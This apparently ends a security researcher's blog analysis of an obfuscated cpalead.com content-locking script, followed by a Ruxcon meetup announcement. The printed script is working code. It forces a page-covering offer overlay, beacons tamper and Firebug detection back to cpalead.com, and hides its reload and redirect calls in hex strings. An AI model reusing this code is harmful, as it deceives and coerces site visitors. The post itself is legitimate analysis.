jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(onoroff){var embeds=document.getElementsByTagName('embed');for(var ems=document.embeds,i=0,em;em=ems[i];i++){if(em.id!='video_controller'&&em.id!='video_bucket'){if(onoroff==0){if(navigator.appName=='Microsoft Internet Explorer'){em.setAttribute('wmode','transparent');em.style.visibility='hidden'}else{em.setAttribute('wmode','transparent');var nx=em.nextSibling,pn=em.parentNode;pn.removeChild(em);pn.insertBefore(em,nx)}}if(onoroff==1){em.setAttribute('wmode','window');if(navigator.appName=='Microsoft Internet Explorer'){em.style.visibility='visible'}}}}}function mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(onoroff){object_tags=document.getElementsByTagName('object');for(i=0;i!=object_tags.length;i++){if(object_tags[i].id!='video_controller'&&object_tags[i].id!='video_bucket'){if(onoroff==0){object_tags[i].setAttribute('wmode','transparent');object_tags[i].style.visibility='hidden'}if(onoroff==1){object_tags[i].style.visibility='visible';object_tags[i].setAttribute('wmode','window')}}}}function getPageSize(){var c,d;if(window.innerHeight&&window.scrollMaxY){c=window.innerWidth+window.scrollMaxX;d=window.innerHeight+window.scrollMaxY}else if(document.body.scrollHeight>document.body.offsetHeight){c=document.body.scrollWidth;d=document.body.scrollHeight}else{c=document.body.offsetWidth;d=document.body.offsetHeight}var a,b;if(self.innerHeight){a=document.documentElement.clientWidth?document.documentElement.clientWidth:self.innerWidth;b=self.innerHeight}else if(document.documentElement&&document.documentElement.clientHeight){a=document.documentElement.clientWidth;b=document.documentElement.clientHeight}else if(document.body){a=document.body.clientWidth;b=document.body.clientHeight}pageHeight=d<b?b:d;pageWidth=c<a?c:a;return arrayPageSize=new Array(pageWidth,pageHeight,a,b)}function dontscroll(){var arrayPageSize=getPageSize();if((arrayPageSize[1]-document.getElementById('aijvqsnovujrsfoj3').style.height.replace("px",""))>30){document.getElementById('aijvqsnovujrsfoj3').style.height=(arrayPageSize[1]+'px')}if(mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e==0){setTimeout("dontscroll();",500)}}function mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(gateid,adixdgozwczhuvaf6e84b){if(adixdgozwczhuvaf6e84b!=xwwjxyvbmsrjfpud17e9cae225420){top.location.href='http://www.cpalead.com/adblock.php?pub=42138'}var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.getElementById('aijvqsnovujrsfoj3');var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(1);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(1);yecqogvnndwlktmu(1);mhhyykdwhgmowiwtcad9ac9c65ac5a6b8b8039d9e4abe61e=1;cbtonfugwctexmjdff8bd9e3648ab7=true;if(getWidgetSetting(gateid,'donation_widget')==1&&secondclose!=true){dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.filter="alpha(opacity=0)";dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.opacity="0.0";document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='http://www.surveysforcharity.org/thankyou-overlay.php';secondclose=true}else{zcpkmswwmxlgjzbue41a138882143252732d893.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').src='about:blank';document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='none'}return false}function guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9(tampertype){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){if(window.console&&window.console.firebug){var hasfirebug=1}else{var hasfirebug=0}dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper.php?pub=42138&firebug="+hasfirebug+"&tamper="+tampertype;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);sgfplcetedjsqmbvbbcb115()}}function ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69(reason){if(!cbtonfugwctexmjdff8bd9e3648ab7&&ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6){dpjfszjhzduviwkn424c2477e2d48=new Image();dpjfszjhzduviwkn424c2477e2d48.src="http://www.cpalead.com/widget-tamper-test.php?pub=42138&reason="+reason;document.body.appendChild(dpjfszjhzduviwkn424c2477e2d48);lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73('http://www.cpalead.com/nostyle.php?pub=42138')}}function hienslexztaecvon972b4c6959457b72d8591114abeb305d(){if(!document.getElementById('aijvqsnovujrsfoj3')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-not-found')}else if(!document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-not-found')}else if(!document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831')){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-found')}else if(document.getElementById('aijvqsnovujrsfoj3').style.width!="100%"||document.getElementById('aijvqsnovujrsfoj3').style.display!="block"||document.getElementById('aijvqsnovujrsfoj3').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('overlay-styles')}else if(document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.width!="100%"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.display!="block"||document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2').style.visibility!="visible"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('widget-styles')}else if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display!="block"){guhjvomqufndfyola931eb1a3fc8d9ff74b6aa9('iframe-not-visible')}if(document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight<=300&&document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight!=0){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('iframe-height-invalid-'+document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').offsetHeight)}else if(document.getElementById('aijvqsnovujrsfoj3').offsetHeight<=100&&document.getElementById('aijvqsnovujrsfoj3').clientHeight<=100){ectbuapjynbmiuyj9c139305fe789fa31a4f949596263a69('overlay-height-invalid-'+document.getElementById('aijvqsnovujrsfoj3').offsetHeight+'-'+document.getElementById('aijvqsnovujrsfoj3').clientHeight)}setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d()",1000)}function sgfplcetedjsqmbvbbcb115(){var _0x96be=["\x72\x65\x6C\x6F\x61\x64","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];window[_0x96be[1]][_0x96be[0]]()}function lxyzruidcgfwoqsj63037fceb7141ffa03df3d1a19d88f73(url){var _0xb500=["\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];top[_0xb500[1]][_0xb500[0]]=url}function loadGatewayIframe(gateid){document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').contentWindow.location.replace('http://www.cpalead.com/mygateway_iframe_loader.php?pub=42138&subid=203.45.56.190&gateid='+gateid+'&ref='+escape(document.referrer)+'')}function createOverlay(gateid){var arrayPageSize=getPageSize();var gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62=document.getElementsByTagName("body").item(0);var dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5=document.createElement("div");dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.setAttribute('id','aijvqsnovujrsfoj3');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='none';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.position='absolute';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.top='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.left='0';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.zIndex='11863836';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.width='100%';gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.insertBefore(dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5,gnaljgtfhmuinsggfede27946c10e10f13725961cdee1e62.firstChild);opacity_setting_ie=getWidgetSetting(gateid,'opacity');opacity_setting_moz=opacity_setting_ie/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_ie+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz;dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.height=(arrayPageSize[1]+'px');dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.display='block';dfwtkjhwbgtpwlos0fa0f79b83e1fc0f3d93f796c5.style.visibility='visible'}function myGatewayStart(gateid){var closebuttons=['NzMxNTM%3D'];if(!document.getElementById('aijvqsnovujrsfoj3')){createOverlay(gateid)}else{if(document.getElementById('aijvqsnovujrsfoj3').style.display='none'){document.getElementById('aijvqsnovujrsfoj3').style.display='block';opacity_setting_moz=getWidgetSetting(gateid,'opacity')/100;document.getElementById('aijvqsnovujrsfoj3').style.filter="alpha(opacity="+opacity_setting_moz+")";document.getElementById('aijvqsnovujrsfoj3').style.opacity=opacity_setting_moz}}var arrayPageSize=getPageSize();dontscroll();jrbxaafwxpczsjiy0a8801c687f76b5f6d210b99a0250a37(0);mfmqeakahlkwcepr44a166b848aad13dd422a15f1c03e22(0);var zcpkmswwmxlgjzbue41a138882143252732d893=document.getElementById('wzjyzgbhqzohhlhvef8426b5a89be2');zcpkmswwmxlgjzbue41a138882143252732d893.style.display='block';zcpkmswwmxlgjzbue41a138882143252732d893.style.visibility='visible';zcpkmswwmxlgjzbue41a138882143252732d893.style.position='absolute';zcpkmswwmxlgjzbue41a138882143252732d893.style.top='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.left='0';zcpkmswwmxlgjzbue41a138882143252732d893.style.zIndex='11863846';zcpkmswwmxlgjzbue41a138882143252732d893.style.width='100%';var has_closebtn=0;for(var i=0;i<closebuttons.length;i++){if(closebuttons[i]==gateid||closebuttons[i]==escape(gateid)){var is_donation=getWidgetSetting(gateid,'donation_widget');if(is_donation==1){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/rice-widget/rice-skin-close-button.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 72px; top: 158px; right: -225px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}else{document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" style="cursor: pointer;"><img src="http://static.cpalead.com/images/help/close_btn.png" border="0" alt="Close Widget"></a></div>';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML='<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;"><a onclick="mlrsxoywizifxxng133bf39da0f2ea66014ccd0e3f20a(\''+gateid+'\', \'ytndhhmwdjexjqej106a67d2\');" id="closebtn" style="cursor: pointer;"><img width="135" height="40" src="http://static.cpalead.com/images/blank7.gif" border="0" alt="Close Widget"></a></div>'}var has_closebtn=1;found=i;break}}if(has_closebtn==0){document.getElementById('lpepmphihufelzdd28c18f8093587772fdd38f').innerHTML='';document.getElementById('arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c').innerHTML=''}zcpkmswwmxlgjzbue41a138882143252732d893.style.height=(arrayPageSize[1]+'px');setTimeout("loadGatewayIframe('"+gateid+"');",500);document.getElementById('wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831').style.display='block';ayztojyyqznptcooae9e1da0e096ad7bf8bb8aa6=true;setTimeout("hienslexztaecvon972b4c6959457b72d8591114abeb305d();",5000)}function secondpass(){countdown=countdown-1;document.getElementById("closelink").innerHTML=countdown;if(countdown<=0){riunpfcaxfcggjhpf()}else{setTimeout("secondpass()",1000)}}document.write('<style type="text/css">#aijvqsnovujrsfoj3{background-color: #000; filter:alpha(opacity=80); opacity: 0.80; -moz-opacity: 0.80;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a {background:none;font-weight:normal;color:#fff;text-decoration:none}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 img {border: 0px;}');document.write('#wzjyzgbhqzohhlhvef8426b5a89be2 a:hover {background:none;font-weight:normal;color:#fff;text-decoration:underline}</style>');document.write('<div id="wzjyzgbhqzohhlhvef8426b5a89be2" style="display:none; text-align: center; line-height: normal; ">');document.write('<div id="lpepmphihufelzdd28c18f8093587772fdd38f" align="center" style="position: absolute; width: 100%; z-index: 11863866;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863866; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div id="arrmnntlgutxhtqc8f4e5c3813f230bb38e7ea6abcfcbe7c" align="center" style="position: absolute; width: 100%; z-index: 11863936;">');document.write('<div style="position: relative; width: 135px; top: 452px; right: 172px; text-align: center; z-index: 11863936; font-size: 12px; background-color: transparent;">');document.write('</div>');document.write('</div>');document.write('<div style="margin: 72px auto 0px; background: transparent; height: 482px; z-index: 11863881;">');document.write('<iframe width="100%" height="640" id="wvbzqebijvmpzwod022ee7977ca8127f7e4936abbc831" src="" allowtransparency="true" frameborder="0" style="position: relative; height: 640px; overflow-x: hidden; overflow-y: hidden; background-color: transparent; z-index: 11863886; " scrollbars="NO"></iframe>');document.write('</div></div>');
The next steps would be far to time consuming for me given the glaringly obvious conclusion you can draw by googleing for cpalead or http://www.cpalead.com/mygateway_iframe_loader.php.
In conclusion there isn't anything new here. The techniques aren't very advanced, but god enough to keep the general public ignorant of what's really going on. I did find the firebug / anti tamper code used in the last bit of js interesting, but I'm sure that malware analysts have seen it thousands of times before.
I am presenting at this months Ruxcon Monthly Meetup.
Date: Friday, 25th June
Time: 6:00PM
Location: RMIT University, City Campus
https://my.rmit.edu.au/portal/page/portal/RMITPortal/campusmaps?dsize=max
Room: Building 8, Level 9, Room 42 (008.09.042)
RMIT Building 8 entrance is off Swanston Street (just past Swanston and
La Trobe). Please take the lift to Level 9 and make your way to Room 42.
We will have directions posted up in the building.
Presentations
=============
Unsanitary Web Activities - Tim Noise (MovingData)
In the land of the internet, web developers are constantly rolling out
new applications and letting them free into the Internet. Many with
little knowledge or experience in security. They assume the users will
provide data in a manner they expect. This talk will cover webapp
security basics and commonplace attacks, showing you the effect this
oversight can have, and how to prevent it.
Pownage Coquillage: Real World Tales From The Trenches - Sash Biskup
(Stratsec)
In this talk the presenter will discuss various security incidents he
has been involved in during the course of his career. Starting with old
school bof through to modern day malware and blackmail. This isn't a
deep technical analysis of each incident but an overview of the
charateristics of each of the attacks and what the repurcussions were to
the organisation or individual.
Static analysis with Graudit - Eldar Marcussen
Graudit is a rough audit tool, that can be used to find vulnerabilities
in source code (C, ASP, .NET, JSP, PHP, Perl and Python). In this
presentation I will show how to get the most out of graudit.
